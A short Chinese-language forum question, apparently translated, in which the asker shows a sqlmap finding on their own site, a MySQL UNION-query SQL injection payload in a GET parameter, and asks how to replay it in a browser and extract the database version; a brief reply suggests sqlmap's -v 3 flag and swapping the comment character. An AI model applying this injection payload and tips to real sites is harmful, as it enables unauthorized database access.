我想了解SQLmap是如何工作的。Sqlmap流量捕获
例如,sqlmap找到我的网站上注入 -
Place: GET
Parameter: selected
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
使用SQLMAP,我可以转储数据库,但如何转储从浏览器相同的数据库?我试图把下面的链接放到浏览器中,但它不起作用 -
http://www.site.com/index.php?act=il&ed=1' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6,0x579786e676651,0x373a), NULL, NULL, NULL, NULL#
我在浏览器中根本没有得到任何结果。我试着用不同的方法把/ ** /和+等,但吸。
如何获取Sqlmap发送的渗透测试的链接?
如何利用一个简单的选择版本()查询与此注射?
也许这是不是真的工作?
如何获取Sqlmap发送渗透测试的链接? 解决了我只是使用sqlmap密钥-v 3 如何利用此注入简单选择版本()查询?只需更改#与 - - 在浏览器 – 2012-08-28 11:10:41